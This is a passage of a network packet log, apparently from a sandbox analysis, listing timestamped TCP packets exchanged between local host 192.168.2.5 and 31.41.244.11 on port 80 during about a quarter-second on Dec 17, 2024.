Dec 17, 2024 06:03:22.014183044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.014236927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.015295982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.015404940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.015425920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.015542984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.016359091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.016443014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.016454935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.016503096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.017431021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.017476082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.017559052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.017637014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.018539906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.018637896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.018661022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.018732071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.019670010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.019747972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.019778967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.019880056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.020761013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.020880938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.020904064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.020924091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.021919966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.021991014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.022032976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.022094965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.023034096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.023107052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.023186922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.024128914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.024213076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.024255037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.024255037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.025252104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.025295973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.025367975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.025471926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.026357889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.026402950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.026408911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.026549101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.027468920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.027517080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.027556896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.027616978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.028639078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.028805017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.028826952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.028917074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.029714108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.029767036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.029805899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.029900074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.030795097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.030886889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.030910969 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.030929089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.031909943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.032000065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.032027006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.032115936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.033025026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.033083916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.033130884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.033186913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.034167051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.034244061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.034282923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.034539938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.035239935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.035317898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.035353899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.035653114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.036410093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.036475897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.036489010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.036667109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.037482023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.037542105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.037581921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.037842989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.038597107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.038710117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.038731098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.038773060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.039732933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.039793968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.039828062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.040059090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.040823936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.040925980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.040960073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.041001081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.041935921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.041996002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.042046070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.042167902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.043047905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.043160915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.043329000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.043329000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.044157028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.044325113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.044337034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.044403076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.045277119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.045386076 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.045398951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.045483112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.046380043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.046433926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.046453953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.046493053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.047496080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.047626019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.047646046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.047692060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.048630953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.048726082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.048727989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.048839092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.049725056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.049792051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.049827099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.049875021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.050888062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.050981998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.051017046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.051074982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.051980019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.052093029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.052100897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.052154064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.053092003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.053159952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.053180933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.053252935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.054193020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.054326057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.054351091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.054373026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.055326939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.055423975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.055444956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.055461884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.056426048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.056508064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.056550980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.056643009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.057517052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.057594061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.057635069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.057720900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.058646917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.058744907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.058850050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.058964968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.059781075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.060009956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.060157061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.060221910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.060873032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.060921907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.060976982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.060976982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.061978102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.062063932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.196242094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.196268082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.196393013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.196732998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.196794987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.196939945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.196939945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.197834969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.197901964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.197921038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.197973013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.198982954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.199074984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.199085951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.199182034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.200082064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.200139999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.200165033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.200182915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.201190948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.201268911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.201296091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.201363087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.202287912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.202399015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.202435970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.202436924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.203388929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.203450918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.203547955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.203598022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.204516888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.204587936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.204608917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.204654932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.205658913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.205751896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.205761909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.205813885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.206736088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.206856966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.206875086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.206958055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.207878113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.207937956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.207971096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.208023071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.208978891 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.209120035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.209137917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.209233999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.210114002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.210206032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.210212946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.210268974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.211205959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.211281061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.211360931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.211414099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.212325096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.212451935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.212464094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.212500095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.213407040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.213532925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.213567972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.213567972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.214524031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.214597940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.214639902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.214731932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.215663910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.215733051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.215773106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.215826988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.216753960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.216836929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.216872931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.216922998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.217874050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.217947006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.217989922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.218091965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.218981981 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.219077110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.219093084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.219188929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.220104933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.220182896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.220244884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.220304966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.221216917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.221299887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.221318960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.221370935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.222363949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.222527027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.222673893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.223444939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.223500967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.223576069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.223649025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.224627972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.224687099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.224833012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.225078106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.225657940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.225786924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.225795984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.225857973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.226855040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.226994038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.226994991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.227144957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.227900028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.227968931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.228009939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.228108883 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.229027033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.229139090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.229161978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.229218006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.230113983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.230168104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.230179071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.230232000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.231281996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.231350899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.231395006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.231518984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.232386112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.232464075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.232481003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.232589006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.233465910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.233521938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.233572006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.233680010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.234652996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.234767914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.234778881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.234910011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.235691071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.235791922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.235829115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.235888004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.236793995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.236910105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.236932039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.236977100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.237900019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.237937927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.238023043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.238075018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.239073992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.239154100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.239176035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.239339113 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.240138054 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.240230083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.240259886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.240344048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.241288900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.241332054 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.241409063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.241478920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.242379904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.242505074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.242511034 CET	49850	80	192.168.2.5	31.41.244.11
